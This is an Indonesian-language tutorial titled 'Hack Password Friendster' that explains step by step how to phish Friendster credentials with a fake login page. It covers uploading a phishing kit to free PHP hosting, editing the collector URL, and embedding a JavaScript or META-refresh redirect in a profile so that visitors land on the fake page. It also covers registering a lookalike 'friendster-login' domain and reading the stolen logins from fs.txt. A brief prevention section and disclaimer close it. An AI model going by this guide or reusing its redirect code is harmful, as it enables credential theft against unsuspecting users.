Tutorial

Hack Password Friendster

Metode : Fake Login

Level : Pemula & Medium

Created By : ciebal

Hacking bukan sekedar teori – s’to Jasakom

 Fake login artinya adalah login palsu, maka pada kesempatan kali ini saya
akan membahas sedikit tentang Halaman login asli yang di palsukan oleh Hacker
untuk mendapatkan Username dan Password Target. Tapi kelemahannya adalah
trik ini hanya ampuh bagi pengguna FS yang Awam, bagi yang pintar dan teliti
maka trik ini mudah di ketahui. Ada banyak cara untuk mengambil Password
orang lain, dan cara yang paling simple adalah Fake Login.
Baiklah sekarang akan saya berikan gambaran singkat mengenai Fake Login
FS, dalam proses Fake Login FS ada beberapa hal yang harus dipersiapkan,
yaitu:
1. Web Hosting Support PHP, terserah apa aja tapi saya sarankan
mennggunakan Ripway Karena simple dan mudah di gunakan.
2. Source Code (Saya Sertakan pada file ini)
3. Linker JS yang Update (optional)

Pendaftaran Web Hosting

Sekarang kamu harus mempunyai Account di ripway, Maka dari itu kamu
harus daftar terlebih dahulu. Berikut cara Daftarnya :
1. Buka http://www.ripway.com
2. Klik Sign Up pada halaman Utama Ripway
3. Maka muncul form-form yang harus kamu isi, isikan terserah kamu
4. Jika sudah lengkap, maka klik Sign Up Now!
5. Jangan Lupa username dan Password yang tadi anda isi
Pembuatan File
1. Login pada Ripway
2. Jika sudah login maka tampil halaman utama account kamu, Click Here
to View your files. Lihat gambar :
3. Terdapat beberapa pilihan, maka pilih Upload untuk mengupload Source
Code yang saya sertakan. Yaitu : friendster.html, login.php, fs.txt,
fakelogin.swf.

4. Upload terlebih dahulu file login.php dan fs.txt

5. Modifikasi Kode friendster.html, berikut ini yang mesti kamu ganti:
Pada file friendster.html kamu buka dengan Notepad, lalu tekan
tombol CTRL+F untuk mencari kata.
Pada form pencarian ketikan h1.ripway.com/ciebal/FS/login.php,
lalu ganti URL itu dengan URL login.php punya kamu. Misalkan
URLnya adalah : h1.ripway.com/namakamu/login.php lihat
gambar untuk mengetahui bagaimana cara mendapatkan URL tersebut:
 6. Jika sudah modifikasi file friendster.html maka kamu harus meng-
uploadnya di ripway dalam satu folder.
7. Kamu sudah mendapatkan URL friendster.html, Fake Login telah selesai
dibuat, selanjutnya menempatkan di FS milik kamu.

Menempatkan file friendster.html di FS Kita

Untuk menempatkan File yang telah kamu upload tadi, kamu harus memiliki
JS Eksternal, berikut caranya untuk membuat JS eksternal.
1. Pada file yang saya sertakan terdapat file fakelogin.swf, buka file
tersebut denga notepad, caranya klik kanan file tersebut lalu ada option
“open with..” lalu pilih Notepad, jika belum ada maka pili “Choose
Program” maka muncul window baru, cari program Notepad.
2. Setelah terbuka file-nya, lalu kamu edit bagian yang di tebalkan dengan
URL friendater.html :
 //Redirect menyang liyane
function getgoing()
{
top.location="URL FAKE LOGIN KAMU";
}

if (top.frames.length==0)
{
setTimeout('getgoing()',1000);
}
3. Jika sudah di edit maka upload file fakelogin.swf ke ripway, kamu sudah
mempunyai URL JS eksternalnya, selanjutnya masukan ke Linker.

Proses Generate ke Linker

1. Kamu sudah memiliki URL JS eksternal yang telah di upload, contoh :
h1.ripway.com/namakamu/fakelogin.swf
2. Selanjutnya cari Linker JS yang update, cari saja di google dengan kata
“JS Linker” atau kunjungi situs www.balibersatu.com/layout/index3.html
4. Copy URL JS eksternal tadi lalu Paste pada website linker tersebut, lalu
klik Generate. Linkerpun telah kamu dapatkan selanjutnya kamu tinggal
Save pada FS kamu.
5. Save di Bagian “About Me” atau “Who I want to Meet”

Alternative jika tidak menggunakan JS eksternal

Bagi kamu yang merasa sedikit kerepotan karena harus membuat JS
eksternal, ada alternative lain yang tidak perlu repot-repot membuat JS
eksternal, tapi kekurangan script ini hanya pada proses load yang lambat, kalau
menggunakan JS eksternal proses akan lebih cepat. Berikut scriptnya :
<META HTTP-EQUIV=Refresh CONTENT='1; URL= URL KAMU '>
Simpan di about Me atau Who I want to Meet dan ganti bagian yang saya
tebalkan dengan URL friendster.html punya kamu.
INGAT!! : Jika Linker tersebut telah di save pada FS maka jangan sekali-kali edit
FS kamu dengan meng-klik Edit Profile atau mengganti Kata “Shout Outnya”
karena akan menyebabkan Linker tidak berjalan. Pokoknya jangan edit profile FS
kamu, maka sebelum kamu memasuka Linker Fs kamu sudah di edit sebaik
mungkin agar kamu tidak perlu meng-editnya kembali.
Apabila Linker sudah tidak berjalan karena kamu meng-edit Profile, maka kamu
harus mencari Linker yang lain, yang beda dengan sebelumnya.
++++++
Untuk melihat siapa saja korban yang telah masuk perangkap kita, kamu buka
file fs.txt yang telah di upload di ripway.

Pemahaman Lanjut
1. Pemahaman Redirection.
Proses yang kita bahas tadi intinya hanya prose redirection atau proses
pemindahan halaman web secara otomatis menggunakan script, Script
untuk Me-Ridirection adalah file fakelogin.swf , fakelogin.swf berfungsi
untuk memindahkan URL FS kita kepada file friendster.html yang tadi kita
buat secara otomatis ketika orang mengunjungi FS kita maka secara
otomatis pengunjung akan di bawa ke file friendster.html punya kita yang
berisikan Login palsu.

2. Kreatifitas Fakename URL

Bagian ini juga sangat mendukung suksesnya Fake Login di FS, atau
disebut dengan kreatifitas membuat domain palsu / alamat palsu untuk
Fake Login FS kita, saya sendiri menggunakan domain
http://www.friendster-login.cjb.net dengan bantuan cjb setidaknya alamat
depan fakefs tersebut sudah sama dengan FS nya, disini anda dituntun
mencari yang bagus untuk Faking domainnya, sehingga orang akan
tertipu jika hanya melihat pada bagian tampilan saja.
Yang dibutuhkan adalah hanya Free Domain :
http://www.cjb.net (http://www.friendster-login.cjb.net)
Fake URL yang mirip dengan http://friendster.com, dan bila dibuka isinya
adalah file friendster.html milik kamu, yang ada di ripway.com.
Untuk domain terserah kamu, yang penting awalnya harus ada kata
friendster, karena apabila orang awam terjebak maka dia tidak memperhatikan
alamat yang di Address bar, dan langsung mengetikan Passwordnya.
Untuk domain, kamu bisa mencari di GOOGLE yang lebih bagus selain cjb.net
agar proses Fake Login kamu berjalan dengan lancar.

Catatan :
Sebelum kamu mem-publish Fake Login, maka cobalah terlebih dahulu di FS
sendiri (kalau bisa daftar FS baru untuk percobaan). Pengetahuan ini hanya
dasar dan bisa kamu kembangkan sendiri.
 PENCEGAHAN
Agar kamu tidak terlalu menyalahkan saya (walaupun tetap saja bersalah)
karena telah memberikan tutorial yang sensitive seperti ini, berikut adalah
beberapa Opsi yang harus kita perhatikan agar tidak terjebak oleh orang yang
juga memakai Fake Login, diantaranya:
1. Biasakan membuka FS menggunakan Mozilla Firefox.
2. Matikan option auto approve, di FS kita karena jika ini tidak dilakukan maka
bisa saja teman mengirim comment yang mengandung Phishing. Dengan
cara Men-setting “Approve comments automatically”: Pilih “Never”.
3. Teliti jika ingin login, lihat URL pada Address Bar, jika bukan dari
http://www.friendster.com maka jangan berani-berani login, close saja, dan
buka dengan alamat yang benar yaitu http://www.friendster.com.
4. Apabila ketika membuka FS orang tiba-tiba kamu disuruh login kembali
maka patut di curigai, Lihat URL yang dada di Address Bar apakah
http://www.friendster.com/login.php bukan..? jika bukan maka jangan
sekali-kali mengetikan email+password kamu.

Sekian Tutorial singkat dari saya, semoga kamu tidak menjadi korban trik yang
bodoh seperti ini. Kamu yang melakukan maka kamu juga yang bertanggung
jawab. Jangan membawa Nama lembaga/organisasi, orang lain, atau siapapun
untuk melakukan hal seperti ini.

“Saya hanya orang bisa yang ingin selalu belajar dan tidak ingin ketinggalan
informasi mengenai teknologi. Apabila kita ketinggalan informasi teknologi maka
kita akan dimakan oleh teknologi.” - ciebal
“Selalu belajar, jangan takut untuk mencoba, jangan malu bertanya, hargai ilmu,
hargai juga yang memberi ilmu, Jangan pelit dengan Ilmu...” - ciebal
Hacking bukan sekedar teori – s’to Jasakom
Hacking is Art - Hacking No Maling
 About Me
Name : Mohamad iqbal
Nick Name : ciebal, flowchart
Thanks to : Allah SWT, My Parents, My family, My
Teachers, My Friends, Member HC,
Member YF, All Reader.
Contact Me Via :
Email : ciebal745@gmail.com
FS : ciebal@bluehat.com
YM : ciebal_745@yahoo.com
Website & Blog :
www.my-ciebal.co.cc
(Website Pribadi)
www.ciebal-collection.co.cc
(Free Download)
ciebal.wordpress.com
(Blog Tutorial Komputer)

Tokoh Favorite Saya :